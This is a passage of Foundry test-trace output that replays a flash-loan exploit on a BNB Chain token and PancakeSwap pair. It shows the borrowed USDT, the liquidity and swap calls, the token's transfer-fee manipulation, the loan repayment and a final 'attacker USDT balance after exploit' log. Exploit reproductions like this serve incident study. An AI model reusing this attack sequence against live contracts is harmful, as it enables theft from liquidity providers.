    │   │   │   │   │   ├─ [8834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, to: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, spender: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 999999804217143396397902289410 [9.999e29])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x6961c91e0e1ce81436fde2fd79d2f70f4e7b89cd6c8dd58d553d8ad616274406: 0x000000000000000000000000000000000000000c9f2c738a4df1abff78955efa → 0x000000000000000000000000000000000000000c9f2c735add8432f8504d5a02
    │   │   │   │   │   │   │   @ 0x317a211acee417ea6369bcca994cc5ff96f957ce922197f8f408c7c4caca9c20: 0x00000000000000000000000000000000000000000000002f706d7907284804f8 → 0
    │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x0000000000000000000000000000000000000000000000d0ca4cbbe0e0fe0000 → 0x0000000000000000000000000000000000000000000001003aba34e8094604f8
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [22462] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0 → 0x00000000000000000000000000000000000000000000002f706d7907284804f8
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [68687] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955, 1064917447741779394192 [1.064e21], 875098235840705856760 [8.75e20], 0, 0, 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 1669888304 [1.669e9])
    │   │   │   │   │   │   ├─ [676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8
    │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2795514041177288943010643 [2.795e24], 2302099913407902964208473 [2.302e24], 1669888304 [1.669e9]
    │   │   │   │   │   │   ├─ [14503] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transferFrom(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 1062659961652457503430 [1.062e21])
    │   │   │   │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2795514041177288943010643 [2.795e24], 2302099913407902964208473 [2.302e24], 1669888304 [1.669e9]
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2795514041177288943010643 [2.795e24]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 1062659961652457503430 [1.062e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 2257486089321890762 [2.257e18])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x000000000000000000000000000000000000000000000039bab2c88bf45ebe90 → 0x0000000000000000000000000000000000000000000000001f5433a3376ac3ca
    │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x000000000000000000000000000000000000000000024ff91ead5e9263eb0353 → 0x000000000000000000000000000000000000000000025032ba0bf37b20defe19
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x0000000000000000000000000000000000000000000000795ab2138edc9111c3 → 0x00000000000000000000000000000000000000000000003fbf537ea61f9d16fd
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000001e77d161c546795a35359 → 0x00000000000000000000000000000000000000000001e7ac8689cd6ebdeb5851
    │   │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x00000000000000000000000000000000000000000000002f706d7907284804f8 → 0
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x0000000000000000000000000000000000000000000001003aba34e8094604f8 → 0x0000000000000000000000000000000000000000000000d0ca4cbbe0e0fe0000
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [39594] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::mint(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025)
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2796576701138941400514073 [2.796e24]
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2302975011643743670065233 [2.302e24]
    │   │   │   │   │   │   │   ├─ [354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 141630835901557675728 [1.416e20])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 898624711903037630121 [8.986e20])
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 2796576701138941400514073 [2.796e24], reserve1: 2302975011643743670065233 [2.302e24])
    │   │   │   │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 1062659961652457503430 [1.062e21], amount1: 875098235840705856760 [8.75e20])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x0000000000000000000000000000000000000000000021559914fabac1959765 → 0x0000000000000000000000000000000000000000000021865001491669e1be0e
    │   │   │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x00000000000000000000000000000000000000000000005685d7e5ecd181c8f7 → 0x00000000000000000000000000000000000000000000005e335db4c9037e5fc7
    │   │   │   │   │   │   │   │   @ 11: 0x00000000000000000000000466d81cc36badaa8b0d91719afcf28a35a7b24098 → 0x000000000000000000000004681f993b0ff770376ca23c1925725f4bc3d9fde9
    │   │   │   │   │   │   │   │   @ 8: 0x6388793000000001e77d161c546795a35359000000024ff91ead5e9263eb0353 → 0x6388793000000001e7ac8689cd6ebdeb5851000000025032ba0bf37b20defe19
    │   │   │   │   │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000001f490804ee2376fe924c6 → 0x00000000000000000000000000000000000000000001f4c8e4c0ff6f4a31e23f
    │   │   │   │   │   │   │   └─ ← [Return] 898624711903037630121 [8.986e20]
    │   │   │   │   │   │   └─ ← [Return] 1062659961652457503430 [1.062e21], 875098235840705856760 [8.75e20], 898624711903037630121 [8.986e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x5a88114F02bfFb04a9A13a776f592547B3080237, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 135561130660443051608553 [1.355e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   @ 0x45d200eaad19b383f882e843a6298328f1eede3199198c40c8d09600a1d73bd9: 0x000000000000000000000000000000000000000000001e0649a115be51360df6 → 0x0000000000000000000000000000000000000000000001518105dfb90a68c40d
    │   │   │   │   │   │   @ 0x6961c91e0e1ce81436fde2fd79d2f70f4e7b89cd6c8dd58d553d8ad616274406: 0x000000000000000000000000000000000000000c9f2c738a4df1abff78955efa → 0x000000000000000000000000000000000000000c9f2c735add8432f8504d5a02
    │   │   │   │   │   │   @ 19: 0x00000000000000000000000000000000000000000000007375659117e8bd7d1f → 0
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000001cb4c89b360546cd49e9
    │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x000000000000000000000000000000000000000000000000243bcc11c2c9da76 → 0x00000000000000000000000000000000000000000000002f706d7907284804f8
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit Swap(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0x473C33C55bE10bB53D81fe45173fcc444143a13e, : 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, : 112565616880285973943000 [1.125e23], : 135561130660443051608553 [1.355e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000001cb4c89b360546cd49e9
    │   │   │   │   │   @ 0x95e76b7acba54050619e6b5210bc5b576b2b169a113311897f5343545716a460: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffe829ce4125941fe0ed27
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 135561130660443051608553 [1.355e23]
    │   │   ├─ [53086] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(135561130660443051608553 [1.355e23], 0, [0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1669888304 [1.669e9])
    │   │   │   ├─ [24387] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 135561130660443051608553 [1.355e23])
    │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2796576701138941400514073 [2.796e24], 2302975011643743670065233 [2.302e24], 1669888304 [1.669e9]
    │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2796576701138941400514073 [2.796e24]
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 132849908047234190576382 [1.328e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 677805653302215258042 [6.778e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 677805653302215258042 [6.778e20])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x46989EEc5A978c766F108Fee75c6c12dBFA313Ef, value: 1355611306604430516085 [1.355e21])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640563477929474250758320354656 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x000000000000000000000000000000000000000000025032ba0bf37b20defe19 → 0x000000000000000000000000000000000000000000026c5488e17f760f378917
    │   │   │   │   │   @ 0xa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49: 0x0000000000000000000000000000000000000000000052f06d2656106bfbb9ac → 0x0000000000000000000000000000000000000000000053152b97c0930218e966
    │   │   │   │   │   @ 0x154ed8d3d46f6828e5e29dbb341cabc8d0d90d2faa1e11d330d8b794e667e477: 0x000000000000000000000000000000000000000000005ab4439332a8adf22e49 → 0x000000000000000000000000000000000000000000005afdc07607adda2c8dbe
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000001cb4c89b360546cd49e9 → 0
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffa5cc48a6a5522bf63f49 → 0xffffffffffffffffffffffffffffffffffffffffffff8917800b6f4ce528f560
    │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x00000000000000000000000000000000000000000000003fbf537ea61f9d16fd → 0x0000000000000000000000000000000000000000000000647dc4e928b5ba46b7
    │   │   │   │   │   @ 19: 0 → 0x000000000000000000000000000000000000000000000024be716a82961d2fba
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 403436034909674363294289 [4.034e23]
    │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 2796576701138941400514073 [2.796e24], 2302975011643743670065233 [2.302e24], 1669888304 [1.669e9]
    │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   └─ ← [Return] 2929426609186175591090455 [2.929e24]
    │   │   │   ├─ [18716] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::swap(0, 104190952224083371240486 [1.041e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 104190952224083371240486 [1.041e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 104190952224083371240486 [1.041e23])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000001e7ac8689cd6ebdeb5851 → 0x00000000000000000000000000000000000000000001d19c529ca0f3d4c92c2b
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000556e4fafbea07fd61251 → 0x000000000000000000000000000000000000000000006b7e839ceb1b68f83e77
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2929426609186175591090455 [2.929e24]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2198784059419660298824747 [2.198e24]
    │   │   │   │   ├─ emit Sync(reserve0: 2929426609186175591090455 [2.929e24], reserve1: 2198784059419660298824747 [2.198e24])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 132849908047234190576382 [1.328e23], amount1In: 0, amount0Out: 0, amount1Out: 104190952224083371240486 [1.041e23], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x6388793000000001e7ac8689cd6ebdeb5851000000025032ba0bf37b20defe19 → 0x6388793000000001d19c529ca0f3d4c92c2b000000026c5488e17f760f378917
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 507626987133757734534775 [5.076e23]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, 500000000000000000000000 [5e23])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, value: 500000000000000000000000 [5e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000006b7e839ceb1b68f83e77 → 0x00000000000000000000000000000000000000000000019d75b584a498783e77
    │   │   │   │   @ 0xa1bb3ea675b840e963c59cc969a45ddfeefd63ae58d64dc7dba145305988350c: 0x000000000000000000000000000000000000000000005b8a53adc51e050a96df → 0x00000000000000000000000000000000000000000000c56b61952b94d58a96df
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000001cb4c89b360546cd49e9
    │   │   └─ ← [Stop]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 88835287116471120612 [8.883e19]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 932287030315518475802335 [9.322e23]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 88835287116471120612 [8.883e19]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 932287030315518475802335 [9.322e23]
    │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 500000000000000000000000 [5e23])
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 7626987133757734534775 [7.626e21]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT balance after exploit", val: 7626987133757734534775 [7.626e21], decimals: 18)
    ├─  storage changes:
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 18.56s (16.65s CPU time)

Ran 2 test suites in 19.60s (19.41s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
